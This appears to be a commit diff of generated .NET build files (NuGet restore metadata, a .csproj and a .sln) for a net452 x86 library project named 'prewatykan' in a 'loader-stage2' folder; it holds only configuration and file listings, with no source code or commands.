"build/.NETFramework/v4.5.2/System.Design.xml",
"build/.NETFramework/v4.5.2/System.Device.dll",
"build/.NETFramework/v4.5.2/System.Device.xml",
"build/.NETFramework/v4.5.2/System.DirectoryServices.AccountManagement.dll",
"build/.NETFramework/v4.5.2/System.DirectoryServices.AccountManagement.xml",
"build/.NETFramework/v4.5.2/System.DirectoryServices.Protocols.dll",
"build/.NETFramework/v4.5.2/System.DirectoryServices.Protocols.xml",
"build/.NETFramework/v4.5.2/System.DirectoryServices.dll",
"build/.NETFramework/v4.5.2/System.DirectoryServices.xml",
"build/.NETFramework/v4.5.2/System.Drawing.Design.dll",
"build/.NETFramework/v4.5.2/System.Drawing.Design.xml",
"build/.NETFramework/v4.5.2/System.Drawing.dll",
"build/.NETFramework/v4.5.2/System.Drawing.xml",
"build/.NETFramework/v4.5.2/System.EnterpriseServices.Thunk.dll",
"build/.NETFramework/v4.5.2/System.EnterpriseServices.Wrapper.dll",
"build/.NETFramework/v4.5.2/System.EnterpriseServices.dll",
"build/.NETFramework/v4.5.2/System.EnterpriseServices.xml",
"build/.NETFramework/v4.5.2/System.IO.Compression.FileSystem.dll",
"build/.NETFramework/v4.5.2/System.IO.Compression.FileSystem.xml",
"build/.NETFramework/v4.5.2/System.IO.Compression.dll",
"build/.NETFramework/v4.5.2/System.IO.Compression.xml",
"build/.NETFramework/v4.5.2/System.IO.Log.dll",
"build/.NETFramework/v4.5.2/System.IO.Log.xml",
"build/.NETFramework/v4.5.2/System.IdentityModel.Selectors.dll",
"build/.NETFramework/v4.5.2/System.IdentityModel.Selectors.xml",
"build/.NETFramework/v4.5.2/System.IdentityModel.Services.dll",
"build/.NETFramework/v4.5.2/System.IdentityModel.Services.xml",
"build/.NETFramework/v4.5.2/System.IdentityModel.dll",
"build/.NETFramework/v4.5.2/System.IdentityModel.xml",
"build/.NETFramework/v4.5.2/System.Management.Instrumentation.dll",
"build/.NETFramework/v4.5.2/System.Management.Instrumentation.xml",
"build/.NETFramework/v4.5.2/System.Management.dll",
"build/.NETFramework/v4.5.2/System.Management.xml",
"build/.NETFramework/v4.5.2/System.Messaging.dll",
"build/.NETFramework/v4.5.2/System.Messaging.xml",
"build/.NETFramework/v4.5.2/System.Net.Http.WebRequest.dll",
"build/.NETFramework/v4.5.2/System.Net.Http.WebRequest.xml",
"build/.NETFramework/v4.5.2/System.Net.Http.dll",
"build/.NETFramework/v4.5.2/System.Net.Http.xml",
"build/.NETFramework/v4.5.2/System.Net.dll",
"build/.NETFramework/v4.5.2/System.Net.xml",
"build/.NETFramework/v4.5.2/System.Numerics.dll",
"build/.NETFramework/v4.5.2/System.Numerics.xml",
"build/.NETFramework/v4.5.2/System.Printing.dll",
"build/.NETFramework/v4.5.2/System.Printing.xml",
"build/.NETFramework/v4.5.2/System.Reflection.Context.dll",
"build/.NETFramework/v4.5.2/System.Reflection.Context.xml",
"build/.NETFramework/v4.5.2/System.Runtime.Caching.dll",
"build/.NETFramework/v4.5.2/System.Runtime.Caching.xml",
"build/.NETFramework/v4.5.2/System.Runtime.DurableInstancing.dll",
"build/.NETFramework/v4.5.2/System.Runtime.DurableInstancing.xml",
"build/.NETFramework/v4.5.2/System.Runtime.Remoting.dll",
"build/.NETFramework/v4.5.2/System.Runtime.Remoting.xml",
"build/.NETFramework/v4.5.2/System.Runtime.Serialization.Formatters.Soap.dll",
"build/.NETFramework/v4.5.2/System.Runtime.Serialization.Formatters.Soap.xml",
"build/.NETFramework/v4.5.2/System.Runtime.Serialization.dll",
"build/.NETFramework/v4.5.2/System.Runtime.Serialization.xml",
"build/.NETFramework/v4.5.2/System.Security.dll",
"build/.NETFramework/v4.5.2/System.Security.xml",
"build/.NETFramework/v4.5.2/System.ServiceModel.Activation.dll",
"build/.NETFramework/v4.5.2/System.ServiceModel.Activation.xml",
"build/.NETFramework/v4.5.2/System.ServiceModel.Activities.dll",
"build/.NETFramework/v4.5.2/System.ServiceModel.Activities.xml",
"build/.NETFramework/v4.5.2/System.ServiceModel.Channels.dll",
"build/.NETFramework/v4.5.2/System.ServiceModel.Channels.xml",
"build/.NETFramework/v4.5.2/System.ServiceModel.Discovery.dll",
"build/.NETFramework/v4.5.2/System.ServiceModel.Discovery.xml",
"build/.NETFramework/v4.5.2/System.ServiceModel.Routing.dll",
"build/.NETFramework/v4.5.2/System.ServiceModel.Routing.xml",
"build/.NETFramework/v4.5.2/System.ServiceModel.Web.dll",
"build/.NETFramework/v4.5.2/System.ServiceModel.Web.xml",
"build/.NETFramework/v4.5.2/System.ServiceModel.dll",
"build/.NETFramework/v4.5.2/System.ServiceModel.xml",
"build/.NETFramework/v4.5.2/System.ServiceProcess.dll",
"build/.NETFramework/v4.5.2/System.ServiceProcess.xml",
"build/.NETFramework/v4.5.2/System.Speech.dll",
"build/.NETFramework/v4.5.2/System.Speech.xml",
"build/.NETFramework/v4.5.2/System.Threading.Tasks.Dataflow.xml",
"build/.NETFramework/v4.5.2/System.Transactions.dll",
"build/.NETFramework/v4.5.2/System.Transactions.xml",
"build/.NETFramework/v4.5.2/System.Web.Abstractions.dll",
"build/.NETFramework/v4.5.2/System.Web.ApplicationServices.dll",
"build/.NETFramework/v4.5.2/System.Web.ApplicationServices.xml",
"build/.NETFramework/v4.5.2/System.Web.DataVisualization.Design.dll",
"build/.NETFramework/v4.5.2/System.Web.DataVisualization.dll",
"build/.NETFramework/v4.5.2/System.Web.DataVisualization.xml",
"build/.NETFramework/v4.5.2/System.Web.DynamicData.Design.dll",
"build/.NETFramework/v4.5.2/System.Web.DynamicData.Design.xml",
"build/.NETFramework/v4.5.2/System.Web.DynamicData.dll",
"build/.NETFramework/v4.5.2/System.Web.DynamicData.xml",
"build/.NETFramework/v4.5.2/System.Web.Entity.Design.dll",
"build/.NETFramework/v4.5.2/System.Web.Entity.Design.xml",
"build/.NETFramework/v4.5.2/System.Web.Entity.dll",
"build/.NETFramework/v4.5.2/System.Web.Entity.xml",
"build/.NETFramework/v4.5.2/System.Web.Extensions.Design.dll",
"build/.NETFramework/v4.5.2/System.Web.Extensions.Design.xml",
"build/.NETFramework/v4.5.2/System.Web.Extensions.dll",
"build/.NETFramework/v4.5.2/System.Web.Extensions.xml",
"build/.NETFramework/v4.5.2/System.Web.Mobile.dll",
"build/.NETFramework/v4.5.2/System.Web.Mobile.xml",
"build/.NETFramework/v4.5.2/System.Web.RegularExpressions.dll",
"build/.NETFramework/v4.5.2/System.Web.RegularExpressions.xml",
"build/.NETFramework/v4.5.2/System.Web.Routing.dll",
"build/.NETFramework/v4.5.2/System.Web.Services.dll",
"build/.NETFramework/v4.5.2/System.Web.Services.xml",
"build/.NETFramework/v4.5.2/System.Web.dll",
"build/.NETFramework/v4.5.2/System.Web.xml",
"build/.NETFramework/v4.5.2/System.Windows.Controls.Ribbon.dll",
"build/.NETFramework/v4.5.2/System.Windows.Controls.Ribbon.xml",
"build/.NETFramework/v4.5.2/System.Windows.Forms.DataVisualization.Design.dll",
"build/.NETFramework/v4.5.2/System.Windows.Forms.DataVisualization.dll",
"build/.NETFramework/v4.5.2/System.Windows.Forms.DataVisualization.xml",
"build/.NETFramework/v4.5.2/System.Windows.Forms.dll",
"build/.NETFramework/v4.5.2/System.Windows.Forms.xml",
"build/.NETFramework/v4.5.2/System.Windows.Input.Manipulations.dll",
"build/.NETFramework/v4.5.2/System.Windows.Input.Manipulations.xml",
"build/.NETFramework/v4.5.2/System.Windows.Presentation.dll",
"build/.NETFramework/v4.5.2/System.Windows.Presentation.xml",
"build/.NETFramework/v4.5.2/System.Windows.dll",
"build/.NETFramework/v4.5.2/System.Workflow.Activities.dll",
"build/.NETFramework/v4.5.2/System.Workflow.Activities.xml",
"build/.NETFramework/v4.5.2/System.Workflow.ComponentModel.dll",
"build/.NETFramework/v4.5.2/System.Workflow.ComponentModel.xml",
"build/.NETFramework/v4.5.2/System.Workflow.Runtime.dll",
"build/.NETFramework/v4.5.2/System.Workflow.Runtime.xml",
"build/.NETFramework/v4.5.2/System.WorkflowServices.dll",
"build/.NETFramework/v4.5.2/System.WorkflowServices.xml",
"build/.NETFramework/v4.5.2/System.Xaml.dll",
"build/.NETFramework/v4.5.2/System.Xaml.xml",
"build/.NETFramework/v4.5.2/System.Xml.Linq.dll",
"build/.NETFramework/v4.5.2/System.Xml.Linq.xml",
"build/.NETFramework/v4.5.2/System.Xml.Serialization.dll",
"build/.NETFramework/v4.5.2/System.Xml.dll",
"build/.NETFramework/v4.5.2/System.Xml.xml",
"build/.NETFramework/v4.5.2/System.dll",
"build/.NETFramework/v4.5.2/System.xml",
"build/.NETFramework/v4.5.2/UIAutomationClient.dll",
"build/.NETFramework/v4.5.2/UIAutomationClient.xml",
"build/.NETFramework/v4.5.2/UIAutomationClientsideProviders.dll",
"build/.NETFramework/v4.5.2/UIAutomationClientsideProviders.xml",
"build/.NETFramework/v4.5.2/UIAutomationProvider.dll",
"build/.NETFramework/v4.5.2/UIAutomationProvider.xml",
"build/.NETFramework/v4.5.2/UIAutomationTypes.dll",
"build/.NETFramework/v4.5.2/UIAutomationTypes.xml",
"build/.NETFramework/v4.5.2/WindowsBase.dll",
"build/.NETFramework/v4.5.2/WindowsBase.xml",
"build/.NETFramework/v4.5.2/WindowsFormsIntegration.dll",
"build/.NETFramework/v4.5.2/WindowsFormsIntegration.xml",
"build/.NETFramework/v4.5.2/XamlBuildTask.dll",
"build/.NETFramework/v4.5.2/XamlBuildTask.xml",
"build/.NETFramework/v4.5.2/mscorlib.dll",
"build/.NETFramework/v4.5.2/mscorlib.xml",
"build/.NETFramework/v4.5.2/sysglobl.dll",
"build/.NETFramework/v4.5.2/sysglobl.xml",
"build/Microsoft.NETFramework.ReferenceAssemblies.net452.targets",
"microsoft.netframework.referenceassemblies.net452.1.0.3.nupkg.sha512",
"microsoft.netframework.referenceassemblies.net452.nuspec"
]
}
},
"projectFileDependencyGroups": {
".NETFramework,Version=v4.5.2": [
"Microsoft.NETFramework.ReferenceAssemblies >= 1.0.3"
]
},
"packageFolders": {
"C:\\Users\\Erdef\\.nuget\\packages\\": {},
"C:\\Program Files (x86)\\Microsoft Visual Studio\\Shared\\NuGetPackages": {}
},
"project": {
"version": "1.0.0",
"restore": {
"projectUniqueName": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\prewatykan.csproj",
"projectName": "___.netmodule",
"projectPath": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\prewatykan.csproj",
"packagesPath": "C:\\Users\\Erdef\\.nuget\\packages\\",
"outputPath": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\obj\\",
"projectStyle": "PackageReference",
"fallbackFolders": [
"C:\\Program Files (x86)\\Microsoft Visual Studio\\Shared\\NuGetPackages"
],
"configFilePaths": [
"C:\\Users\\Erdef\\AppData\\Roaming\\NuGet\\NuGet.Config",
"C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.FallbackLocation.config",
"C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config"
],
"originalTargetFrameworks": [
"net452"
],
"sources": {
"C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {},
"https://api.nuget.org/v3/index.json": {}
},
"frameworks": {
"net452": {
"targetAlias": "net452",
"projectReferences": {}
}
},
"warningProperties": {
"warnAsError": [
"NU1605"
]
},
"restoreAuditProperties": {
"enableAudit": "true",
"auditLevel": "low",
"auditMode": "direct"
},
"SdkAnalysisLevel": "10.0.100"
},
"frameworks": {
"net452": {
"targetAlias": "net452",
"dependencies": {
"Microsoft.NETFramework.ReferenceAssemblies": {
"suppressParent": "All",
"target": "Package",
"version": "[1.0.3, )",
"autoReferenced": true
}
},
"runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\10.0.106\\RuntimeIdentifierGraph.json"
}
}
}
}

View file

@ -0,0 +1,11 @@
{
"version": 2,
"dgSpecHash": "z+EZAa1VkIU=",
"success": true,
"projectFilePath": "C:\\Users\\Erdef\\Desktop\\pliki\\rzeczy\\Watykanczyk-V3\\loader-stage2\\prewatykan.csproj",
"expectedPackageFiles": [
"C:\\Users\\Erdef\\.nuget\\packages\\microsoft.netframework.referenceassemblies\\1.0.3\\microsoft.netframework.referenceassemblies.1.0.3.nupkg.sha512",
"C:\\Users\\Erdef\\.nuget\\packages\\microsoft.netframework.referenceassemblies.net452\\1.0.3\\microsoft.netframework.referenceassemblies.net452.1.0.3.nupkg.sha512"
],
"logs": []
}

View file

@ -0,0 +1,20 @@
<Project Sdk="Microsoft.NET.Sdk.WindowsDesktop">
<PropertyGroup>
<AssemblyName>___.netmodule</AssemblyName>
<GenerateAssemblyInfo>False</GenerateAssemblyInfo>
<UseWindowsForms>True</UseWindowsForms>
<TargetFramework>net452</TargetFramework>
<PlatformTarget>x86</PlatformTarget>
</PropertyGroup>
<PropertyGroup>
<LangVersion>11.0</LangVersion>
<AllowUnsafeBlocks>True</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup>
<ApplicationIcon>app.ico</ApplicationIcon>
<RootNamespace />
<OutputType>Library</OutputType>
</PropertyGroup>
<ItemGroup />
<ItemGroup />
</Project>

View file

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.9.34622.214
MinimumVisualStudioVersion = 10.0.40219.1
Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "prewatykan", "prewatykan.csproj", "{D6735513-1793-4D54-85AD-C1151C8A3A0D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{D6735513-1793-4D54-85AD-C1151C8A3A0D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{D6735513-1793-4D54-85AD-C1151C8A3A0D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{D6735513-1793-4D54-85AD-C1151C8A3A0D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{D6735513-1793-4D54-85AD-C1151C8A3A0D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {8EC9C533-91C8-4190-A662-CC0A0D494931}
EndGlobalSection
EndGlobal